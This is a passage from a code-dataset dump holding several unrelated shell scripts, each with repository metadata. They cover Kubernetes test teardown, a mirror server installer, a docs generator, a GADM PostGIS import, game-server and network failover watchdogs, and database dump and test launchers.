. "${ROOT}/contrib/hack/utilities.sh" || { echo 'Cannot load Bash utilities'; exit 1; }
# Tear down user workloads and service-catalog resources so the cluster
# does not leak network resources between test runs.
function wipe_cluster() {
  local ns
  for ns in $(kubectl get namespaces -oname | grep -v kube-system); do
    ns=${ns##*/}  # strip the "namespace/" prefix produced by -oname
    kubectl delete deployments,services,configmaps,pods,replicasets \
        --all --namespace "${ns}"
    # Give pods up to 20 checks (2s apart, 60s cap) to leave the
    # Terminating state; warn but keep going if they do not.
    if ! wait_for_expected_output -x -e 'Terminating' -n 20 -s 2 -t 60 \
        kubectl get pods --namespace "${ns}"; then
      echo "WARNING: Some Kubernetes resources in namespace "${ns}" failed to terminate."
    fi
    [[ "${ns}" == "default" ]] || kubectl delete namespace "${ns}"
  done
  kubectl delete serviceinstances,serviceclasses,servicebindings,servicebrokers --all #TODO: Eventually this should work.
  # Temporarily, delete all by name.
  kubectl delete serviceinstances backend frontend
  kubectl delete serviceclasses booksbe user-provided-service
  kubectl delete servicebindings database
  kubectl delete servicebrokers k8s ups
  return 0
}
| true |
f806210fc590066b4820bd11be978f007923f004 | Shell | JasonSFuller/mirror | /install.sh | UTF-8 | 5,625 | 3.65625 | 4 | [
"MIT"
] | permissive | #!/bin/bash
################################################################################
function init
{
if [[ "$(id -u)" -ne 0 ]]; then
echo "ERROR: you must be root" 2>&1
exit 1
fi
local self=$(readlink -f "$0")
local selfdir=$(dirname "$self")
MIRROR_CONFIG="${selfdir}/etc/mirror.conf"
now=$(date +%Y%m%d%H%M%S)
if [[ -r "${MIRROR_CONFIG}" ]]; then
source "${MIRROR_CONFIG}"
else
echo "ERROR: could not read config (${MIRROR_CONFIG})" 2>&1
exit 1
fi
}
function install_packages
{
echo 'installing required packages'
yum -y install \
@base @core vim policycoreutils-python rsync \
httpd mod_ssl openssl \
createrepo pykickstart \
tftp-server xinetd syslinux-tftpboot memtest86+ \
tftp telnet nmap # troubleshooting
}
function config_generate_ssl_certs
{
echo 'generating self-signed certs'
key="/etc/pki/tls/private/${MIRROR_HTTPD_SERVER_NAME}.key"
cfg="/etc/pki/tls/certs/${MIRROR_HTTPD_SERVER_NAME}.cfg"
csr="/etc/pki/tls/certs/${MIRROR_HTTPD_SERVER_NAME}.csr"
crt="/etc/pki/tls/certs/${MIRROR_HTTPD_SERVER_NAME}.crt"
echo " private key = $key"
echo " csr template = $cfg"
echo " cert signing req = $csr"
echo " public cert = $crt"
if [[ ! -f "$key" ]]; then
openssl genrsa -out "$key" 4096
chmod 600 "$key"
fi
if [[ ! -f "$cfg" ]]; then
cat <<- EOF > "$cfg"
default_bits = 2048
default_md = sha256
prompt = no
distinguished_name = dn
extensions = ext
req_extensions = ext
x509_extensions = ext
[ dn ]
#C = My Country Code
#ST = My State
#L = My Location
#O = My Organization
#OU = My Organizational Unit
#emailAddress = My Email Address
CN = ${MIRROR_HTTPD_SERVER_NAME}
[ ext ]
subjectAltName = @san
[ san ]
DNS.0 = ${MIRROR_HTTPD_SERVER_NAME}
EOF
# Add the alternate DNS hostnames to the template.
for ((i=0; i<${#MIRROR_HTTPD_SERVER_ALIAS[*]}; i++))
do
echo "DNS.$((i+1)) = ${MIRROR_HTTPD_SERVER_ALIAS[i]}" >> "$cfg"
done
fi
if [[ -f "$csr" ]]; then
echo "Found existing CSR; creating backup '${csr}.${now}.backup' and generating a new one."
mv "$csr" "${csr}.${now}.backup"
fi
openssl req -new -config "$cfg" -key "$key" -out "$csr"
if [[ ! -f "$crt" ]]; then
openssl req -x509 -days 3650 -key "$key" -in "$csr" -out "$crt"
fi
}
# Configure Apache: open the firewall, disable the stock welcome page,
# link in the repo-managed configs, and render the vhost template
# (ServerAlias lines are generated from MIRROR_HTTPD_SERVER_ALIAS).
# Globals read: MIRROR_BASE_PATH, MIRROR_HTTPD_SERVER_ALIAS.
function config_web_server
{
  echo 'configuring the web server'
  firewall-offline-cmd --add-service=http
  firewall-offline-cmd --add-service=https
  # Truncate (rather than delete) welcome.conf so the RPM won't restore it.
  > /etc/httpd/conf.d/welcome.conf
  rm -f /etc/httpd/conf.d/autoindex.conf
  ln -s "${MIRROR_BASE_PATH}/etc/httpd/autoindex.conf" /etc/httpd/conf.d/
  ln -s "${MIRROR_BASE_PATH}/etc/httpd/mirror-www.conf" /etc/httpd/conf.d/
  # Build one "ServerAlias <name>" line per alias; exported so envsubst
  # can substitute it into the template below.
  for i in "${MIRROR_HTTPD_SERVER_ALIAS[@]}"
  do
    printf -v line ' %-26s "%s"\n' "ServerAlias" "$i"
    export MIRROR_HTTPD_SERVER_ALIAS_GENERATED+="$line"
  done
  envsubst \
    < "${MIRROR_BASE_PATH}/etc/httpd/mirror-www.conf.template" \
    > "${MIRROR_BASE_PATH}/etc/httpd/mirror-www.conf"
}
# Configure the xinetd-managed TFTP server: open the firewall, enable the
# service, point it at our tftp root, and copy in the PXE boot binaries.
# Globals read: MIRROR_BASE_PATH, now (backup timestamp from init).
function config_tftp_server
{
  echo "configuring the tftp server"
  firewall-offline-cmd --add-service=tftp
  cp -a /etc/xinetd.d/tftp{,.${now}.backup}
  # Flip "disable = yes" to "no" and serve from our mirror tree (-s).
  sed -i -r 's/^(\s*disable\s*=).*/\1 no/' /etc/xinetd.d/tftp
  sed -i -r "s#^(\\s*server_args\\s*=).*#\\1 -v -s ${MIRROR_BASE_PATH}/tftp#" /etc/xinetd.d/tftp
  # BUG
  # These files are COPIED from the syslinux and memtest86+ package dirs
  # because of an issue with in.tftpd accessing files (symlinks) outside
  # the served directory. Plus, we don't really want binaries in source
  # control. Bottom-line, this means if the syslinux package is updated,
  # these binaries need to be copied again. [*sigh*] It's a good thing
  # it changes infrequently.
  install -o root -g root -m 644 /var/lib/tftpboot/pxelinux.0 "${MIRROR_BASE_PATH}/tftp/"
  install -o root -g root -m 644 /var/lib/tftpboot/chain.c32 "${MIRROR_BASE_PATH}/tftp/"
  install -o root -g root -m 644 /var/lib/tftpboot/menu.c32 "${MIRROR_BASE_PATH}/tftp/"
  install -o root -g root -m 644 /boot/memtest86+-5.01 "${MIRROR_BASE_PATH}/tftp/images/"
}
# Register SELinux file contexts for the mirror tree so httpd and tftpd
# may serve it, then relabel everything under MIRROR_BASE_PATH.
function config_selinux_paths
{
  echo 'configuring selinux paths'
  semanage fcontext -a -t httpd_config_t "${MIRROR_BASE_PATH}/etc/httpd(/.*)?"
  semanage fcontext -a -t httpd_sys_content_t "${MIRROR_BASE_PATH}/www(/.*)?"
  semanage fcontext -a -t httpd_sys_content_t "${MIRROR_BASE_PATH}/theme(/.*)?"
  semanage fcontext -a -t tftpdir_t "${MIRROR_BASE_PATH}/tftp(/.*)?"
  # TODO maybe? allow the auto gen; not happy with autogen RN
  # semanage fcontext -a -t httpd_sys_script_exec_t "${MIRROR_BASE_PATH}/www/ks/auto"
  restorecon -R -v "${MIRROR_BASE_PATH}"
}
# Link the repo-managed cron definition into /etc/cron.d so the mirror
# sync job runs on schedule.
function install_update_cronjob
{
  printf '%s\n' 'installing mirror cronjob'
  ln -s -- "${MIRROR_BASE_PATH}/etc/cron.d/mirror" /etc/cron.d/mirror
}
# Link the repo-managed logrotate policy into /etc/logrotate.d.
function install_logrotate_config
{
  printf '%s\n' 'installing mirror logrotate config'
  ln -s -- "${MIRROR_BASE_PATH}/etc/logrotate.d/mirror" /etc/logrotate.d/mirror
}
################################################################################
# Main sequence: configure everything, then enable/start the services and
# install the recurring jobs.  Each step assumes init succeeded (root +
# readable config).
init
install_packages
config_generate_ssl_certs
config_web_server
config_tftp_server
config_selinux_paths
systemctl enable httpd
systemctl restart httpd
systemctl enable xinetd # tftp
systemctl restart xinetd # tftp
systemctl enable firewalld
systemctl restart firewalld
install_update_cronjob
install_logrotate_config
| true |
97f5d98c74c0d4099a5fbe2a238e6ac09fdf6c0c | Shell | Hiwensen/kotlin-web-site-cn | /pages-includes/docs/tutorials/native/generate-includes.sh | UTF-8 | 4,434 | 3.5 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Abort on error/unset vars; trace commands for CI logs.
set -e -x -u
# This script's directory and the site repository root (four levels up).
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
ROOT="$( cd "${DIR}" && cd "../../../.." && pwd)"
echo "Root directory is $ROOT"
EXTERNAL="$ROOT/external"
SAMPLES_REPO="$EXTERNAL/kotlin-web-site-samples"
# Clone the samples repo on first run; afterwards just refresh its refs.
if [[ ! -d "$EXTERNAL" ]] ; then
  mkdir "$EXTERNAL"
fi
if [[ ! -d "$SAMPLES_REPO" ]] ; then
  git clone https://github.com/kotlin/web-site-samples.git "$SAMPLES_REPO"
else
  git "--git-dir=$SAMPLES_REPO/.git" fetch
fi
# generate_code_block <name> <branch> <lang> <os> <file>
# Appends a language/OS-tagged markdown code sample (the contents of
# <file> on origin/<branch> of the samples repo) to "$DIR/<name>-code.md"
# and a matching download link to "$DIR/<name>-link.md".
# Globals read: DIR, SAMPLES_REPO.
function generate_code_block {
  # All helper variables are now local so repeated calls don't leak
  # state into the global scope.
  local code_target="$DIR/$1-code.md"
  local link_target="$DIR/$1-link.md"
  local branch="$2"
  local remoteBranch="origin/$branch"
  local lang="$3"
  local os="$4"
  local fileInBranch="$5"
  local zipUrl="https://github.com/kotlin/web-site-samples/archive/$branch.zip"

  local code
  code="$(git "--git-dir=$SAMPLES_REPO/.git" show "$remoteBranch:$fileInBranch")"
  # Strip leading blank lines, then trailing blank lines.
  code="$(echo "$code" | sed '/./,$!d' | sed -e :a -e '/^\n*$/{$d;N;};/\n$/ba')"

  # Group the sample markup into a single append instead of 11 separate
  # redirections, and quote the target paths so a DIR containing spaces
  # cannot break the redirects.
  {
    echo ""
    echo "<div class=\"multi-language-sample\" data-lang=\"$lang\" data-os=\"$os\">"
    echo "<div class=\"sample\" markdown=\"1\" theme=\"idea\" mode=\"$lang\" data-highlight-only>"
    echo ""
    echo '```'
    echo "$code"
    echo '```'
    echo ""
    echo "</div>"
    echo "</div>"
    echo ""
  } >> "$code_target"

  {
    echo "<span class=\"multi-language-span\" data-lang=\"$lang\" data-os=\"$os\">"
    echo "[GitHub]($zipUrl)."
    echo "</span>"
  } >> "$link_target"
}
rm -f $DIR/*-code.md
rm -f $DIR/*-link.md
generate_code_block "basic-kotlin-native-app-codeblocks" mpp-kn-app-groovy-macos groovy macos build.gradle
generate_code_block "basic-kotlin-native-app-codeblocks" mpp-kn-app-groovy-linux groovy linux build.gradle
generate_code_block "basic-kotlin-native-app-codeblocks" mpp-kn-app-groovy-windows groovy windows build.gradle
generate_code_block "basic-kotlin-native-app-codeblocks" mpp-kn-app-kotlin-macos kotlin macos build.gradle.kts
generate_code_block "basic-kotlin-native-app-codeblocks" mpp-kn-app-kotlin-linux kotlin linux build.gradle.kts
generate_code_block "basic-kotlin-native-app-codeblocks" mpp-kn-app-kotlin-windows kotlin windows build.gradle.kts
generate_code_block "mapping-primitive-data-types-from-c" mpp-kn-app-groovy-macos-c groovy macos build.gradle
generate_code_block "mapping-primitive-data-types-from-c" mpp-kn-app-groovy-linux-c groovy linux build.gradle
generate_code_block "mapping-primitive-data-types-from-c" mpp-kn-app-groovy-windows-c groovy windows build.gradle
generate_code_block "mapping-primitive-data-types-from-c" mpp-kn-app-kotlin-macos-c kotlin macos build.gradle.kts
generate_code_block "mapping-primitive-data-types-from-c" mpp-kn-app-kotlin-linux-c kotlin linux build.gradle.kts
generate_code_block "mapping-primitive-data-types-from-c" mpp-kn-app-kotlin-windows-c kotlin windows build.gradle.kts
generate_code_block "dynamic-library" mpp-kn-shared-lib-groovy-linux groovy linux build.gradle
generate_code_block "dynamic-library" mpp-kn-shared-lib-groovy-macos groovy macos build.gradle
generate_code_block "dynamic-library" mpp-kn-shared-lib-groovy-windows groovy windows build.gradle
generate_code_block "dynamic-library" mpp-kn-shared-lib-kotlin-linux kotlin linux build.gradle.kts
generate_code_block "dynamic-library" mpp-kn-shared-lib-kotlin-macos kotlin macos build.gradle.kts
generate_code_block "dynamic-library" mpp-kn-shared-lib-kotlin-windows kotlin windows build.gradle.kts
generate_code_block "apple-framework" mpp-kn-framework-groovy-macos-mac groovy macos build.gradle
generate_code_block "apple-framework" mpp-kn-framework-kotlin-macos-mac kotlin macos build.gradle.kts
| true |
5a215bcff1d00896ee837332b72b526f2976fce7 | Shell | GayanSandaruwan/scripts | /char_case_counter/file_size-awk.sh | UTF-8 | 1,718 | 4.3125 | 4 | [] | no_license | #!/bin/bash
###################################################################
#Script Name : file_size-awk.sh
#Description : File size calculator in directory using awk
#Args : source directory which need count the file sizes
#Author : Replace with your name
#Email : replace with your email
###################################################################
directory=${1}
# The command line help #
# Print a one-line usage message on stderr.
# (Extra option descriptions were present only as commented-out echos in
# the original and produced no output.)
display_help() {
    printf 'Usage: %s text_file\n' "$0" >&2
}
# Argument validation: exactly one argument, which must either be --help
# or an existing directory.
if [[ -z "$directory" ]] #Check availability of input params
then
    # echo "Too few input params"
    display_help
    exit 1
fi
if [[ ! -z "${2}" ]] #Check availability of input params
then
    # echo "ERROR: Too many number of input params"
    display_help
    exit 1
fi
if [ "$1" == "--help" ]; then #check if requesting for help
    display_help
    exit 0
fi
if [ ! -d "$directory" ]; then
    # Control will enter here if $sourcefile doesn't exist.
    echo "Error: cannot open $directory"
    display_help
    exit 1
fi
# Sum the size column of a long listing of $directory and print the total.
# NOTE(review): with GNU ls, -G omits the group so the size lands in
# field 4; on BSD ls -G means "colorize" and this breaks — confirm the
# target platform.  Parsing ls is fragile in general (unusual filenames,
# the "total" header, . and .. entries); `du` or `find -printf '%s'`
# would be sturdier, but would change the printed total.
file_size_tot () {
    ls -FaGl "$directory" | awk '{ total += $4;}; END { print total }';
}
file_size_tot
| true |
dba5d3013042c7fb3fc1cb2defd2c022439b5c74 | Shell | MiloMonnier/gadm_postgis | /build_GADM_database.sh | UTF-8 | 3,075 | 2.875 | 3 | [] | no_license | # Get the latest download link on https://gadm.org/download_world.html
# Download (idempotently, -nc skips an existing file) and unpack the
# world GADM 3.6 geopackage.
wget -nc https://biogeo.ucdavis.edu/data/gadm3.6/gadm36_gpkg.zip
unzip gadm36_gpkg.zip
# PostgreSQL connection settings used by psql/ogr2ogr below.
host='localhost'
port='5432'
db='gadm'
user='milo'
psswd='postgres'
# Create a new database "gadm"
psql -U ${user} -d postgres -c "CREATE DATABASE ${db};"
psql -U ${user} -d ${db} -c "CREATE EXTENSION IF NOT EXISTS postgis;"
# Import the geopackage file into the database
PGIDS="dbname=${db} host=${host} port=${port} user=${user} password=${psswd}"
ogr2ogr -f PostgreSQL PG:"${PGIDS}" gadm36.gpkg
# Create a test database (here, Senegal and Guinea) and check it with QGIS for example
psql -U ${user} -d ${db} -c "
DROP TABLE IF EXISTS gadmtest;
CREATE TABLE gadmtest AS
SELECT * FROM gadm
WHERE gid_0 IN ('SEN','GIN');
"
# Create one aggregated table per administrative level (gadm_0 = country
# scale … gadm_5 = finest subdivision).  Level N groups by the country
# id/name plus the gid/name/engtype triple of every level 1..N and
# dissolves the geometries with ST_Union.
# The column list is built incrementally inside a loop, replacing six
# near-identical copy-pasted CREATE TABLE statements; the generated SQL
# is equivalent to the originals.
cols='gid_0, name_0'
for lvl in 0 1 2 3 4 5; do
    if [ "$lvl" -gt 0 ]; then
        cols="${cols}, gid_${lvl}, name_${lvl}, engtype_${lvl}"
    fi
    psql -U ${user} -d ${db} -c "
    DROP TABLE IF EXISTS gadm_${lvl};
    CREATE TABLE gadm_${lvl} AS
    SELECT
        ${cols},
        ST_Union(wkb_geometry) AS geom
    FROM gadm
    GROUP BY
        ${cols};
    "
done
# Don't create spatial index
# Don't check geometry validity | true |
9fef1eac2b3bdfe5cf4e0e1bd5329274aeb64809 | Shell | heihachi/Coding-Projects | /bash/restarter-bin | UTF-8 | 3,065 | 3.203125 | 3 | [] | no_license | #!/bin/bash
######################
GDB_ENABLED=1
GDB="trinity.gdb"
WORLDSERVER="/WoW/TW/bin/world.pid" ### Put here the pid you configured on your worldserver.conf file ###
AUTHSERVER="/WoW/TW/bin/auth.pid" ### Put here the pid you configured on your authserver.conf file ###
### If you want to have more realms runing, just uncoment or copy this line ###
#EXTRAWORLDSERVER="/WoW/4.x/bin/world.pid" ### Put here the pid you configured on your worldserver.conf file ###
WORLD_CONFIG="../etc/worldserver.conf"
REALM_CONFIG="../etc/authserver.conf"
### If you want to have more realms runing, just uncoment or copy this line ###
#EXTRAWORLD_CONFIG="/WoW/4.x/etc/worldserver.conf"
WORLD_SCREEN_NAME="world"
REALM_SCREEN_NAME="realm"
### If you want to have more realms runing, just uncoment or copy this line ###
#EXTRAWORLD_SCREEN_NAME="cata"
TRACE_BEGIN_STRING="SIGSEGV"
TRACE_FILE="../logs/trace.log"
ERR_FILE="../logs/error.log"
SYSLOG="../logs/system.log"
SYSLOGEXTRA="../logs/system_extra.log"
SYSERR="../logs/system.err"
SYSERREXTRA="../logs/system_extra.err"
LINKS_FILE="../logs/crash_links.link"
RESTARTLOG="../logs/restarts.log"
######################
# checkStatus <pid>: set the global TEST to 1 if a process with that PID
# exists (i.e. /proc/<pid> is present), or to 0 otherwise.
# The original wrapped the assignments in `eval "TEST=1"` — a needless
# (and risky) eval for a plain assignment — and left $1 outside the
# quoted path.
function checkStatus() {
	if [ -d "/proc/$1" ]; then
		TEST=1
	else
		TEST=0
	fi
}
while :
do
PID=$(cat $WORLDSERVER)
checkStatus $PID
if [ $TEST -eq 0 ]; then
DATE=$(date)
echo "Restarting Trinity Core blizz($DATE)"
echo "Restarting Trinity Core blizz($DATE)" >> $RESTARTLOG
if [ $GDB_ENABLED -eq 1 ]; then
grep -B 10 -A 1800 "$TRACE_BEGIN_STRING" "$SYSLOG" >> "$TRACE_FILE"
echo "------------------`date +%Y-%m-%d-%H-%M-%S`------------------" >> "$TRACE_FILE"
cat "$TRACE_FILE" | grep "http" >> "$LINKS_FILE"
cat "$SYSERR" > "$ERR_FILE"
sudo screen -A -m -d -S $WORLD_SCREEN_NAME ./start worldserver $GDB "$WORLD_CONFIG" "$SYSLOG" "$SYSERR" 1
fi
if [ $GDB_ENABLED -eq 0 ]; then
sudo screen -A -m -d -S $WORLD_SCREEN_NAME ./start worldserver null "$WORLD_CONFIG" null null 0
fi
fi
### If you want to have more realms runing, just uncoment or copy those lines ###
# PID=$(cat $EXTRAWORLDSERVER)
# checkStatus $PID
# if [ $TEST -eq 0 ]; then
# DATE=$(date)
# echo "Restarting Second Core blizz($DATE)"
# echo "Restarting Second Core blizz($DATE)" >> $RESTARTLOG
# screen -A -m -d -S $EXTRAWORLD_SCREEN_NAME ./start worldserver null "$EXTRAWORLD_CONFIG" "$SYSLOGEXTRA" "$SYSERREXTRA" 1
# fi
PID=$(cat "$AUTHSERVER")
checkStatus $PID
if [ $TEST -eq 0 ]; then
DATE=$(date)
echo "Restarting Trinity Realm ($DATE)"
sudo screen -A -m -d -S $REALM_SCREEN_NAME ./start authserver null "$REALM_CONFIG"
fi
sleep 45
done
| true |
a6b9a6a158f5077301b5db655e6b2c0150fa5264 | Shell | rid9/r1-linux | /pulseaudio/pkg.sh | UTF-8 | 1,158 | 3.390625 | 3 | [] | no_license | #!/bin/bash
# Resolve the directory containing this pkg script and pull in the shared
# build helper functions (which consume DEPS/OPT_DEPS/SOURCE_URLS and the
# hook functions defined below).
PKG_DIR=$(realpath "${BASH_SOURCE[0]%/*}")
source "$(realpath "$PKG_DIR/..")/functions.sh"
# Required and optional dependency package names.
DEPS=(libsndfile speex speexdsp)
OPT_DEPS=(alsa-lib dbus glib libcap speex)
# Upstream tarball plus the BLFS glibc-2.27 build-fix patch.
SOURCE_URLS=(
  "https://www.freedesktop.org/software/pulseaudio/releases/pulseaudio-11.1.tar.xz"
  "http://www.linuxfromscratch.org/patches/blfs/8.2/pulseaudio-11.1-glibc_2.27_fix-1.patch"
)
# Post-extract hook: apply the glibc-2.27 compatibility patch and
# regenerate the build system (intltoolize standing in for autopoint).
# Globals: SOURCE_WORK_DIR, SOURCES_DIR — presumably provided by
# functions.sh; confirm against the shared build framework.
after_extract() {
  cd "${SOURCE_WORK_DIR}" &&
  patch -Np1 -i "${SOURCES_DIR}/pulseaudio-11.1-glibc_2.27_fix-1.patch" &&
  AUTOPOINT='intltoolize --automake --copy' autoreconf -fiv
}
# Pre-configure hook: extend the CONFIGURE_FLAGS array (consumed by the
# shared build functions) with pulseaudio-specific ./configure options.
before_configure() {
  local flag
  for flag in \
      "--sysconfdir=/etc" \
      "--localstatedir=/var" \
      "--disable-bluez4" \
      "--enable-bluez5" \
      "--disable-rpath"; do
    CONFIGURE_FLAGS+=("$flag")
  done
}
# Post-install hook: create the pulse system user/group if missing, drop
# the system-wide D-Bus policy, and comment out the ConsoleKit module in
# the default PulseAudio config.
# Globals: SUDO - privilege-escalation prefix, presumably set by
# functions.sh.
after_install() {
  # `grep -q` replaces the old `grep | wc -l` pipeline: same check,
  # one fewer process, and it short-circuits on the first match.
  if ! grep -q '^pulse:' /etc/group; then
    $SUDO groupadd pulse
  fi &&
  if ! grep -q '^pulse:' /etc/passwd; then
    $SUDO useradd -d /var/run/pulse -g pulse pulse
  fi &&
  $SUDO rm -fv /etc/dbus-1/system.d/pulseaudio-system.conf &&
  $SUDO sed -i '/load-module module-console-kit/s/^/#/' /etc/pulse/default.pa
}
| true |
1906c793326e3ef8ab89a6660926ac31e6803352 | Shell | IntelAI/tools | /tensorflow_quantization/tests/integration/launch_test.sh | UTF-8 | 3,518 | 3.3125 | 3 | [
"Apache-2.0"
] | permissive | #
# Copyright (c) 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#!/usr/bin/env bash
# Abort on error and trace commands for CI logs.
set -e
set -x
# To find Dockerfile
cd ../../
# Repository root and the host directory mounted into the container.
TF_REPO=$(pwd)
MOUNTED_DIR=${TF_REPO}/mounted_dir
OUTPUT=${MOUNTED_DIR}/output
DATASET=${MOUNTED_DIR}/dataset
# Pre-cloned models repo may be injected via the environment; otherwise
# it is cloned into OUTPUT below.
INTEL_MODELS=${INTEL_MODELS:-${OUTPUT}/models}
LOGS=${OUTPUT}/test_logs.txt
if [ ! -d ${MOUNTED_DIR} ]; then
mkdir ${MOUNTED_DIR}
fi
if [ ! -d ${DATASET} ]; then
# Copy datasets from an existing shared location on SKX nodes to the mounted directory.
mkdir ${DATASET}
cd ${DATASET}
# when adding new models, please copy the required dataset if it was not already copied from /tf_dataset/dataset/ here.
mkdir imagenet-data && cp ${IMAGENET_TF_DATASET}/* ${DATASET}/imagenet-data
mkdir coco-data && cp ${COCO_TF_DATASET}/* ${DATASET}/coco-data
mkdir coco-data-ssdvgg16 && cp ${COCO_TF_SSDVGG16}/* ${DATASET}/coco-data-ssdvgg16
fi
# OUTPUT directory exists when test fails,
# so we need to clean up and re-create new one for next test run.
# NOTE:
# The supported models training datasets are required, and expected to be copied/exist in the MOUNTED_DIR directory.
# This is for generating the quantized graph min_max ranges (in the data calibration step).
if [ -d ${OUTPUT} ]
then
rm -rf ${OUTPUT}
fi
mkdir ${OUTPUT}
if [ $? -eq 1 ]
then
echo "Output directory creation for test scripts FAILED" | tee ${LOGS}
exit 1
else
echo "Created output directory for running test scripts at: ${OUTPUT}" | tee ${LOGS}
fi
if [ ! -d ${INTEL_MODELS} ]; then
cd ${OUTPUT}
git clone https://github.com/IntelAI/models.git
else
cp -r ${INTEL_MODELS} ${OUTPUT}
fi
cd ${TF_REPO}
# Build and run the docker image
QUANTIZATION_TAG="quantization:latest"
echo "Building quantization tools docker image with tag: ${QUANTIZATION_TAG}" | tee -a ${LOGS}
docker build -f Dockerfile \
-t ${QUANTIZATION_TAG} \
--build-arg HTTP_PROXY=${HTTP_PROXY} \
--build-arg HTTPS_PROXY=${HTTPS_PROXY} \
--build-arg http_proxy=${http_proxy} \
--build-arg https_proxy=${https_proxy} . | tee -a ${LOGS}
if [ "${PIPESTATUS[0]}" -eq "0" ]
then
echo ""
echo "******** Running Quantization Test Scripts ********" | tee -a ${LOGS}
python launch_quantization.py \
--docker-image ${QUANTIZATION_TAG} \
--pre-trained-model-dir ${MOUNTED_DIR} \
--verbose --test | tee -a ${LOGS}
if [ "${PIPESTATUS[0]}" -ne "0" ] && [ "${PIPESTATUS[0]}" -ne "124" ] || [[ "`grep 'usage: bazel-bin/' ${LOGS} > /dev/null`" != "" ]]
then
echo "Test scripts run FAILED !!" | tee -a ${LOGS}
echo "Please check logs at: ${LOGS}" | tee -a ${LOGS}
exit 1
else
echo "Test scripts run completed SUCCESSFULLY !!" | tee -a ${LOGS}
fi
else
echo "Error: Quantization tools docker build FAILED " | tee -a ${LOGS}
echo "Test scripts haven't INITIATED, please fix issue and re-run" | tee -a ${LOGS}
echo "Please check logs at: ${LOGS}" | tee -a ${LOGS}
exit 1
fi
| true |
17aaaf108b88fca16363f515a5d7922a060a4bbb | Shell | ljm516/python-repo | /big-challenge/mysqldb_dump/dump_db.sh | UTF-8 | 1,250 | 3.71875 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Require the target environment name (staging/dev/dev2/...) as $1.
if [ $# = 0 ]
then
  echo "No environment selected. e.g, staging/dev/dev2/dev3"
  exit 1
fi
ENV=$1
# Source (dump) and target (restore) connection settings.
SOURCE_HOST=127.0.0.1
SOURCE_USER=root
SOURCE_PASSWD=PASSWORD
TARGET_HOST=127.0.0.1
TARGET_USER=root
TARGET_PASSWD=PASSWORD
# Databases to copy: each <db>_localhost is dumped and restored into
# <db>_<ENV>.
declare -a databases=(yolar)
for db in "${databases[@]}"
do
  DUMP_FILE=${db}_localhost_dump.sql
  SOURCE_DB=${db}_localhost
  TARGET_DB=${db}_${ENV}
  # Dump data
  printf "> Dumping $db to $DUMP_FILE ... "
  # mysqldump --host=$SOURCE_HOST --user=$SOURCE_USER --password=$SOURCE_PASSWD --single-transaction --set-gtid-purged=OFF $SOURCE_DB > $DUMP_FILE
  # NOTE(review): a bare -p makes mysqldump/mysql prompt interactively
  # for the password; SOURCE_PASSWD/TARGET_PASSWD above are unused in
  # this active code path — confirm which behaviour is intended.
  mysqldump --opt -u $SOURCE_USER -p $SOURCE_DB > $DUMP_FILE
  printf "Finished\n"
  #Restore from dumps
  printf "> Restore $db from $DUMP_FILE ... "
  # mysql --host=$TARGET_HOST --user=$TARGET_USER --password=$TARGET_PASSWD $TARGET_DB < $DUMP_FILE
  mysql -u $TARGET_USER -p $TARGET_DB < $DUMP_FILE
  printf "Finished\n"
done
# Map the short environment names used on the command line to the
# capitalized names expected by test.py; unknown names pass through
# unchanged.  The helper + case replaces the original chain of five
# unquoted `[ $ENV = ... ]` tests, which printed a test(1) error
# whenever ENV was empty.
map_env_name() {
    case "$1" in
        dev)  echo Develop  ;;
        dev2) echo Develop2 ;;
        dev3) echo Develop3 ;;
        dev4) echo Develop4 ;;
        dev5) echo Develop5 ;;
        *)    echo "$1"     ;;
    esac
}
ENV=$(map_env_name "$ENV")
python3 -m test.py $ENV | true |
ed1daf6cbb6397f8f407cf4a9613dc604c98efc7 | Shell | vimsen/VGW | /fallback.sh | UTF-8 | 3,341 | 3.328125 | 3 | [] | no_license | #!/bin/bash
# Failover watchdog setup: bring up the 3G modem, set the wired default
# route, start the VPN, and take an initial connectivity reading on both
# interfaces before entering the monitoring loop.
logfile="results.txt"
# Assumed initial state: wired (eth0) up, 3G (ppp0) down.
eth0=1
ppp0=0
#connect 3g
sudo bash /usr/bin/modem3g/sakis3g connect
#add route...
route add default gw 192.168.1.1 # the LAN router we connect through
# connect VPN
echo "Connecting to VPN" && echo "Connecting to VPN" >> $logfile
sudo /home/pi/startVPN.sh #> /dev/null
sleep 15
# One probe per interface: status1/status2 record up (1) or down (0).
ping -c 1 -I eth0 8.8.8.8 > /dev/null && status1=1 || status1=0
#echo status1, $status1
ping -c 1 -I ppp0 8.8.8.8 > /dev/null && status2=1 || status2=0
#echo status2, $status2
fallback=0
# Log helper: write the message to stdout and append it to the logfile
# (replaces the original's duplicated `echo X && echo X >> $logfile`).
log() {
    echo "$1" && echo "$1" >> "$logfile"
}

# Main failover loop: every 10s probe connectivity on eth0 (wired) and
# ppp0 (3G).  While eth0 is healthy, route via the wired gateway; when it
# dies and 3G is alive, fall back to the 3G default route.  Every route
# flip also restarts the VPN so its tunnel follows the active uplink.
while true;do
    ping -c 1 -I eth0 8.8.8.8 > /dev/null
    check_one=$?
    ping -c 1 -I ppp0 8.8.8.8 > /dev/null
    check_two=$?

    if [[ $check_one -eq 0 ]] # eth0 is up
    then
        eth0=1
        log "eth0 is up and routing exists"
        if [ $fallback -eq 1 ]
        then
            # Switch the default route back to the wired gateway.
            # BUG FIX: the original used Unicode en-dashes ("–c") for
            # most vtysh arguments instead of "-c", so vtysh never
            # received the follow-up commands.
            vtysh -c "show run" -c "conf t" -c " no ip route 0.0.0.0/0 10.64.64.64 " -c "ip route 0.0.0.0/0 94.70.239.209" -c "end" -c "show run" > /dev/null
            # kill VPN
            log "Killing VPN"
            service openvpn stop >/dev/null 2>&1
            kill $(pidof openvpn)
            killall openvpn # just to be REALLY CERTAIN
            log "routing via eth0"
            fallback=0
            sleep 5
            # Restart VPN
            log "Restart VPN"
            sudo /home/pi/startVPN.sh #> /dev/null
            sleep 30
        fi
    else # eth0 is down
        eth0=0
        log "eth0 is down"
    fi

    if [[ $check_two -eq 0 ]] # ppp0 is up
    then
